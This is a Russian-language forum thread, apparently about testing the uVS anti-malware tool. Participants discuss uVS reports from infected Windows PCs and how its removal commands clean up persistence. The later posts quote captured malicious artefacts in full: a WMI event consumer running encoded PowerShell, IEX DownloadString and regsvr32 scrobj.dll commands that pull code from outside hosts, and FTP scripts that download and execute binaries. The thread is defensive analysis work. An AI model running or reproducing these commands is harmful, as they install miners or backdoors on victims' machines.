uVS - Тестирование

[PR55.RP55 78]

 Windows 10 Pro x64 (NT v10.0 SP0) build 15063  [C:\WINDOWS]

-----------------------

Полное имя                  {6\[CLSID]
Имя файла                   [CLSID]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{60BD49A6-240E-48ef-8D73-AC8244BE1D85}\CLSID
------------------------

Полное имя                  {E\[CLSID]
Имя файла                   [CLSID]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{EAC2F030-5937-414C-9B7A-6B57F7C072E8}\CLSID

------------------------

Тема\образ.

http://www.tehnari.ru/f35/t262097/

[demkd 561]

7 часов назад, PR55.RP55 сказал:

{6\[CLSID]

содержимое ключа нужно, без него не починить.

[PR55.RP55 78]

Такая вот история.

 

 

[demkd 561]

33 минут назад, PR55.RP55 сказал:

Такая вот история.

и что не так?

[PR55.RP55 78]

11 часов назад, demkd сказал:

и что не так? 

Почему  в списке два процесса uVS - ?

[demkd 561]

2 часа назад, PR55.RP55 сказал:

Почему  в списке два процесса uVS - ?

Windows 64-х битный потому и 2 процесса, один под эмулятором, второй 64-х битный.

[santy 149]

Цитата

Добавлена поддержка WMI классов на базе __TimerInstruction.

судя по свежему образу, видится запись в WMI

Полное имя                  WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\FUCKYOUMM2_ITIMER
Имя файла                   FUCKYOUMM2_ITIMER
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Class              __IntervalTimerInstruction
TimerId                     fuckyoumm2_itimer
IntervalBetweenEvents       10800000
SkipIfPassed                FALSE

                           

ANDREY-PC_2018-12-20_09-32-21_v4.1.2.7z

[PR55.RP55 78]

В 21.12.2018 at 8:28 AM, santy сказал:

Добавлена поддержка WMI классов на базе __TimerInstruction.

И здесь:  http://www.tehnari.ru/f183/t262393/

Сразу две записи:

Полное имя                  WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\SETHOMEPAGE INTERVAL TIMER
Имя файла                   SETHOMEPAGE INTERVAL TIMER
Тек. статус                   в автозапуске
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Class              __IntervalTimerInstruction
TimerId                     SethomePage Interval Timer
IntervalBetweenEvents       900000
SkipIfPassed                FALSE

--------------------

+

.[EVENTFILTER SETHOMEPAGE2]

                            

[PR55.RP55 78]

+

А здесь...

Тема\образ: http://www.tehnari.ru/f35/t262401/

------------------

Записи:

FILE:///C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE

C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE

[PR55.RP55 78]

Тема: http://www.tehnari.ru/f35/t262401/

uVS  видит запись: 

Ссылка                      HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav
Vladislav                   cmd.exe /c start www.dipladoks.org

------------
Но в автоскрипте не будет нормального удаления.

По хорошему не должно быть никаких дополнительных команд.

Только:  delref

Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org

И всё, что есть в автозапуске по:   www.dipladoks.org  и т.д.

 

 

 

 

 

[santy 149]

8 часов назад, PR55.RP55 сказал:

Но в автоскрипте не будет нормального удаления.

по этому образу в автоскрипте будут две команды:

delref HTTP://WWW.DIPLADOKS.ORG/
delref WWW.DIPLADOKS.ORG

вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте

 

Цитата

Полное имя                  WWW.DIPLADOKS.ORG
Имя файла                   WWW.DIPLADOKS.ORG
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Удовлетворяет критериям     
RUN                         (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1)   AND   (ЦИФР. ПОДПИСЬ !~ ДЕЙСТВИТЕЛЬНА)(1) [auto (0)]
RUN.CMD                     (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1)   AND   ( ~ CMD.EXE)(1) [auto (0)]
KB-RIBAKI.ORG               ( ~ REG ADD)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VLADISLAV
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\Actions
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\
                            
Ссылка                      HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav
Vladislav                   cmd.exe /c start www.dipladoks.org

                            

 

 

[PR55.RP55 78]

В 08.01.2019 at 8:32 AM, santy сказал:

вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте

Может и должна.

В теме были применены две команды:

deltsk WWW.DIPLADOKS.ORG

delref HTTP://WWW.DIPLADOKS.ORG/

Но, как мы видим в FRST после этого осталась запись:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

--------------

"HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Vladislav" => removed successfully

------

Цитата

 4.0.21
---------------------------------------------------------
o Добавлена возможность удалять события WMI и задачи без удаления всех ссылок на файл/объект.
Скриптовые команды: delwmi и deltsk

Исходя из этой логики команда: deltsk  не удаляет ссылки.

В 07.01.2019 at 11:48 PM, PR55.RP55 сказал:

По хорошему не должно быть никаких дополнительных команд.

Только:  delref

Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org

И всё, что есть в автозапуске по:   www.dipladoks.org  и т.д.

 

[santy 149]

если deltsk будет удалять и задачи, связанные с данным объектом и все ссылки в реестре на объект, тогда зачем нужен дубль команды, когда все это умеет делать delref.

значит, эта команда (deltsk) введена для того чтобы удалить только задачи, связанные с объектом автозапуска. Например, сам объект автозапуска может быть даже с белой цифровой записью и содержит ряд полезных ссылок в реестре, которые необходимы для функционирования системы, но в тоже время может быть использован через левую задачу для деструктивных действий. Поэтому, в данном случае мы не можем применить delref к объекту, а только deltsk. (Очевидно, при этом будут удалены все задачи, связанные с данным объектом). Если необходимо удалить связанные с объектом задачи  поштучно, в этом случае можно использовать контекстное удаление из info, например: del %Sys32%\TASKS\VLADISLAV, del %Sys32%\TASKS\VLADISLAV1, del %Sys32%\TASKS\VLADISLAV2

 

команда deltsk WWW.DIPLADOKS.ORG скорее всего была применена без внимания, что в автозапуске остался еще запуск по данной ссылке через ключ реестра.

 

 

[PR55.RP55 78]

santy

Я говорю об удалении не всего, а только самой записи: www.dipladoks.org

т.е. удаляется фрагмент\часть при 100% совпадении\соответствии.

В данном случае удалению подлежит:  www.dipladoks.org

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

В итоге получим:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start

-----------

И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты.

Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре.

-----------

Проблема в том, что оператор не видит всей картины.

Если бы была возможность создать поисковый запрос по всему Инфо.

тогда оператор бы увидел все записи в _одном окне:

Цитата

Полное имя                  HTTP://WWW.DIPLADOKS.ORG/
Имя файла                   HTTP://WWW.DIPLADOKS.ORG/
CmdLine                     "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/

 

Полное имя                  WWW.DIPLADOKS.ORG
Имя файла                   WWW.DIPLADOKS.ORG
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Vladislav                   cmd.exe /c start www.dipladoks.org

CmdLine                     "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/

 

CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Vladislav                   cmd.exe /c start www.dipladoks.org

 

[santy 149]

RP55,

ничто не мешает оператору заглянуть внутрь инфо подозрительных объектов чтобы определиться какой командой лучше его зачистить из системы. или delall, или delref, или deltsk или достаточно просто использовать del,

достаточно при этом использовать фильтрующее выражение и обе записи окажутся рядом.
 

Цитата

 

Если бы была возможность создать поисковый запрос по всему Инфо.

тогда оператор бы увидел все записи в _одном окне:

 

а вот каша из строк инфо, которые принадлежат разным объектам не нужна.

отсутствие привязки этих строк к реальному объекту автозапуска из списка только затруднит выбор команды.

скажем, тот же объект в cmdline может быть запущен из lnk файла, и вместо очистки командной строки в ярлыках будет запущено удаление ярлыков.

---------

внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан

[PR55.RP55 78]

В 08.01.2019 at 4:29 PM, santy сказал:

каша из строк инфо, которые принадлежат разным объектам не нужна.

Что мешает создать переход к нужному объекту ?

Выполнили поиск > посмотрели информацию > переход к нужному объекту и на месте приняли решение.

Или создать суммирующее окно Инфо. где будут все объекты и все ссылки удовлетворяющие запросу.

С выделением результата поиска.

В 08.01.2019 at 4:29 PM, santy сказал:

внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан

Давно нужно сделать.

[santy 149]

В 08.01.2019 at 5:52 PM, PR55.RP55 сказал:

santy

Я говорю об удалении не всего, а только самой записи: www.dipladoks.org

т.е. удаляется фрагмент\часть при 100% совпадении\соответствии.

В данном случае удалению подлежит:  www.dipladoks.org

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

В итоге получим:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start

-----------

И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты.

Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре.

ну, в данной строке HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start есть объекты, которые присутствуют в системе, поэтому вряд ли эта строка попадет под удаление отсутствующих объектов. в итоге, у юзера будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п.

Частичное исправление параметров (без удаления ключа), если необходимо, решается сейчас твиками. например: regt 12

[PR55.RP55 78]

santy

Мне кажется, что идея с удалением фрагмента\части интересная.

Единственно нужен такой метод при котором операция не будет приводить к негативным последствиям в виде старта cmd.exe, браузера, командных окон и т.д.

твик regt 12 - команда возвращает запись в исходное значение...

Значит сопоставив две записи:

1) Запись модифицированная

2) Исходная запись - которая сейчас содержится в твике.

3) Получаем разницу.

4) Эту разницу программа и обрабатывает.

-----------

Нужен банк\база стандартных\регулярных исходных значений и отталкиваясь от этого и обработать объект.

8 часов назад, santy сказал:

будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п.

Или выявлять и удалять эти пустые\битые элементы. Что вроде бы и так реализовано.

 

[santy 149]

13 минут назад, PR55.RP55 сказал:

Мне кажется, что идея с удалением фрагмента\части интересная.

может и интересная,

но в данном случае идея с очисткой ссылок и задач, реализованная в программе работает.

командная строка (cmdline), которая может содержать чистые файлы (cmd.exe, wmic.exe, regsvr32.exe, explorer.exe и т.д., через которые могут быть выполнены деструктивные действия), разбивается на отдельные элементы списка автозапуска, и каждый элемент, который был выделен из командной строки, содержит всю инфо, из которой он был выделен. Т.о. если применяется delref к этим элементам, то удаляются из реестра или из tasks все параметры, ключи и actions запуска деструктивного действия.

При этом, сам чистый файл не затрагивается,  не удаляется, а удаляется только его деструктивное применение, прописанное через задачи, или ключи реестра.

 

 

[santy 149]

demkd,

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

;uVS v4.1.2 [http://dsrt.dyndns.org] [Windows 6.1.7601 SP1 Service Pack 1]
; WMI: обработчики событий

Цитата

 

ПОДОЗРИТ.  | хттп]://173.208.139.170/2.TXT
ПОДОЗРИТ.  | хттп://35.182.171.137/3.TXT
ПОДОЗРИТ.  | хттп://WMI.1217BYE.HOST/1.TXT
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://173.208.139.170/S.TXT')&POWERSHELL.EXE
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://35.182.171.137/S.JPG')||REGSVR32
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://WMI.1217BYE.HOST/S.PS1')&POWERSHELL.EXE
автозапуск | &POWERSHELL.EXE
автозапуск | C:\WINDOWS\SYSTEM32\CSCRIPT.EXE
автозапуск | KERNCAP.VBS
автозапуск | WMI:\\.\ROOT\SUBSCRIPTION\NTEVENTLOGEVENTCONSUMER\SCM EVENT LOG CONSUMER.[SCM EVENT LOG FILTER]
автозапуск | C:\WINDOWS\SYSTEM32\SCROBJ.DLL

 

 

АЛЕКСЕЙ-HP_2019-01-11_21-19-41_v4.1.2.7z

[demkd 561]

1 час назад, santy сказал:

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

разобрать все многообразие командных строк просто невозможно, мусор всегда будет

[santy 149]

похоже, какой-то новый подход используется, с комбинированием base64 и реального кода.

consumer_name fuckyoumm4 и consumer_filter fuckyoumm3 засветились в инфо cmd.exe

 

Цитата

 

Полное имя                  C:\WINDOWS\SYSTEM32\CMD.EXE
Имя файла                   CMD.EXE
Тек. статус                 АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
                            
Удовлетворяет критериям     
WMI_ACTIVESCRIPTEVENTCONSUMER.LIST(CONSUMER_NAME ~ FUCKYOUMM)(1) [delall (0)]
TASK.MUSA                   (ССЫЛКА ~ TASKS\MYSA)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
Процесс                     64-х битный
File_Id                     4CE798E559000
Linker                      9.0
Размер                      345088 байт
Создан                      21.11.2010 в 06:23:55
Изменен                     21.11.2010 в 06:23:55
                            
TimeStamp                   20.11.2010 в 09:46:13
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            Cmd.Exe.MUI
Версия файла                6.1.7601.17514 (win7sp1_rtm.101119-1850)
Описание                    Обработчик команд Windows
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
pid = 1708                  Алексей-HP\Алексей
CmdLine                     "C:\Windows\System32\cmd.exe" /c "color 17 & title AutorunsVTchecker & "C:\Users\CD86~1\AppData\Local\Temp\7ZipSfx.000\autorunsc64.exe" -accepteula -a * -vt -vs"
Процесс создан              21:17:13 [2019.01.11]
С момента создания          00:02:35
CPU                         0,01%
CPU (1 core)                0,01%
parentid = 3136             
pid = 1900                  NT AUTHORITY\система
CmdLine                     C:\Windows\system32\cmd.EXE /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
Процесс создан              21:06:50 [2019.01.11]
С момента создания          00:12:58
CPU                         0,00%
CPU (1 core)                0,00%
parentid = 1620             C:\WINDOWS\SYSTEM32\TASKENG.EXE
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>S&ECHO TEST>>S&ECHO 1433>>S&ECHO BINARY>>S&ECHO GET A.EXE C:\WINDOWS\UPDATE.EXE>>S&ECHO BYE>>S&FTP -S:S&C:\WINDOWS\UPDATE.EXE
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>P&ECHO TEST>>P&ECHO 1433>>P&ECHO GET S.DAT C:\WINDOWS\DEBUG\ITEM.DAT>>P&ECHO BYE>>P&FTP -S:P
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>PS&ECHO TEST>>PS&ECHO 1433>>PS&ECHO GET S.RAR C:\WINDOWS\HELP\LSMOSEE.EXE>>PS&ECHO BYE>>PS&FTP -S:PS&C:\WINDOWS\HELP\LSMOSEE.EXE
SHA1                        0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
MD5                         5746BD7E255DD6A8AFA06F7C42C1BA41
                            
Namespace                   \\.\root\subscription
Consumer_Name               fuckyoumm4
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplatecmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
Filter_Name                 fuckyoumm3
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"fuckyoumm4\"";
    Filter = "__EventFilter.Name=\"fuckyoumm3\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "fuckyoumm3";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
    QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
    CommandLineTemplate = "cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll";
    Name = "fuckyoumm4";
};

                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA
                            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA2
                            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA3
                           

 

 

[demkd 561]

26 минут назад, santy сказал:

похоже, какой-то новый подход используется, с комбинированием base64 и реального кода.

в принципе ничего нового, просто затрудняет машинный анализ вот и все, возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

 

[santy 149]

42 минут назад, demkd сказал:

возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

а что здесь означает ключ -enc? закодированный объект?

[PR55.RP55 78]

Вот ещё по теме:  ( http://wmi.1217 )

https://virusinfo.info/showthread.php?t=221283

и тут анализ угрозы:

Оригинал: https://s.tencent.com/research/report/622.html

Перевод: https://translate.google.com/translate?hl=ru&sl=zh-CN&u=https://s.tencent.com/research/report/622.html&prev=search